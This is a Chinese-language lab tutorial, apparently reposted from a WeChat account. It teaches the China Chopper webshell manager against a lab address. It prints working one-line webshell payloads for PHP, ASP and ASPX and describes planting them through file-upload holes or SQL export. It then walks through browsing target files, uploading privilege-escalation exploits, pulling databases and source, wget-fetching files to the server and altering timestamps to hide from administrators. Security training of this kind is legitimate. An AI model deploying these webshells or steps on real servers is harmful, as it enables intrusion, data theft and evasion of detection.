实验环境

操作机：Windows XP

目标地址：172.16.12.2

实验目的

认识中国菜刀工具

熟练使用中国菜刀工具进行网站文件管理

数据库管理

使用虚拟终端等操作

实验内容

中国菜刀的历史

中国菜刀是一款c/s型的webshell管理工具，它不像传统的asp恶意脚本或php恶意脚本上传到网站上可以直接打开，它有自己的服务端程序，但是这个服务端程序却极小，只有一句代码，因此保证了webshell的隐蔽性，并且这段代码所能实现的功能是非常强大的。

作者老兵，一个朴实，低调的技术牛人，当初在台湾闹独立的时候，他在国民党和民进党的网站上留下了“只有一个中国”的黑页，一举成名。

小i提示

在本次实验中,请注意实验工具、实验文件存放路径,不同的文件路径可能会出现不一样的实验结果.

在实验环境中无法连接互联网，请使用您本地的网络环境。

实验工具

中国菜刀：

这里的中国菜刀不是指切菜做饭的工具，而是中国安全圈内使用非常广泛的一款Webshell管理工具，想买菜刀请出门左拐东门菜市场王铁匠处。

中国菜刀是一款专业的网站管理软件，用途广泛，使用方便，小巧实用，据说是一位中国军人退伍之后的作品。只要支持动态脚本的网站，都可以用中国菜刀来进行管理！

在非简体中文环境下使用，自动切换到英文界面。UINCODE方式编译，支持多国语言输入显示。只要支持动态脚本的网站，都可以用中国菜刀来进行管理！主要功能有：文件管理，虚拟终端，数据库管理。

实验步骤

步骤一：安装中国菜刀

中国菜刀只能运行于windows系统下，其安装过程非常简单。

1.解压缩压缩包

2.进入解压后的文件夹中，运行caidao.exe 即可。

3.如果成功弹出工具的界面，则代表环境正常。

（备注：由于菜刀的名气太大，导致很多常见的杀软会报告为病毒.）

步骤2：认识菜刀目录文件

介绍菜刀目录下的几个主要文件及作用

caidao.exe

此为中国菜刀主程序。主程序经常被黑客修改植入后门并传播。

最近几个历史版本中无后门的菜刀 hash 如下：

文件: caidao-20100928.exe 

大小: 200192 字节 

MD5: C05D44DBE353525F492208D891B53875文件: caidao-20111116.exe 

大小: 220672 字节 

MD5: 5001EF50C7E869253A7C152A638EAB8A文件: caidao-20141213.exe 

大小: 220160 字节MD5: 4B4A956B9C7DC734F339FA05E4C2A990

db.mdb

此为菜刀工具的数据库文件，存放了我们添加的shell等信息。菜刀支持从菜刀数据库导入shell。

catch.tmp

此文件为菜刀的缓存数据库(可删除)，可对目标的目录文件等信息进行缓存，可使我们在没网的情况下也能查看目标信息。

步骤3：认识菜刀服务端payload

简单介绍asp、php、aspx、jsp的一句话恶意脚本

PHP:

?php @eval($_POST[pass]);?

ASP:

%eval request("pass")%

NET:

%@PageLanguage="Jscript"% %eval(Request.Item["pass"],"unsafe");%

JSP:

文件较大，在菜刀目录下customizecustomize.jsp

几个脚本中的pass皆为一句话脚本的密码，实际测试可以替换掉

一句话恶意脚本的使用：

以PHP脚本为例，将上述的PHP类型一句话恶意脚本保存为php文件，放在支持PHP脚本的web环境中（实战中通常是利用上传漏洞上传到服务器）

获得该文件的web端地址即可在中国菜刀中使用。（下面有详细介绍）

步骤4：配置菜刀

配置相关参数连接服务端

首先我们需要通过某种方式在目标站上传一个一句话恶意文件。

一般情况下我们是通过以下方法把一句话文件上传（或导出）到web服务器：

文件上传漏洞

后台数据库备份

sql语句导出

我们准备了一个一句话恶意脚本文件hack.php:

?php @eval($_POST[pass]);?

假设我们通过文件上传漏洞把一句话恶意脚本传到了web服务器http://172.16.12.2的web根目录，于是一句话恶意文件（webshell）地址为

http://172.16.12.2/hack.php

一句话文件的密码为pass。

然后我们在中国菜刀中选择添加该shell：

有几个相关参数需要填入：

webshel地址 webshell密码 

分类目录（可选）

脚本类型 编码方式

配置图解如下图：

步骤5：文件管理操作

这些操作比较简单，我直接做操作演示

文件夹查看

实战测试中我们通过文件查看来获得目标机文件目录信息，来了解目标机大致的文件目录结构。

双击我们添加的shell，进入查看目录及文件：

文件上传

实战测试中有可能需要利用文件上传功能上传一些我们后期要用到的提权exp等。

直接拖放文件到对应目录即可

文件下载

实战测试中有可能需要利用文件下载功能下载服务器的数据库信息和源码来进一步分析目标。

右击需要下载的文件，选择下载文件。

菜刀在下载文件完毕后默认打开该文件。

这里要与下面的wget下载文件区分。这里的下载是下载目标机文件到我们本地，而wget则是下载web文件到目标机上。

wget下载文件

这是个小技巧，有时候服务端限制了文件上传，我们就可以通过这个方法来下载文件到服务器。需要注意到的是所下载的文件应该是不被浏览器解析的，如php，txt等。

在想上传的目录右击，选择下载文件到服务器，再填入文件的http地址和保存的绝对位置，然后点击wget即可：

修改文件或文件夹时间

黑客修改文件时间一般是为了规避一些安全软件或管理员通过查看文件创建和修改时间来排除恶意脚本。

右击需要修改时间的文件，选择修改文件（夹）时间，输入对应的时间格式即可：

戳阅读原文，参与实验吧~

受苹果公司新规定影响，微信 iOS 版的赞赏功能被关闭，可通过二维码转账支持公众号。

郑重声明： 本站所有内容均由互联网收集整理、网友上传，并且以计算机技术研究交流为目的， 仅供大家参考、学习，不存在任何商业目的与商业用途。 若您需要商业运营或用于其他商业活动，请您购买正版授权并合法使用。 我们不承担任何技术及版权问题，且不对任何资源负法律责任。 如无法链接失效或侵犯版权，请给我们来信：1849626408@qq.com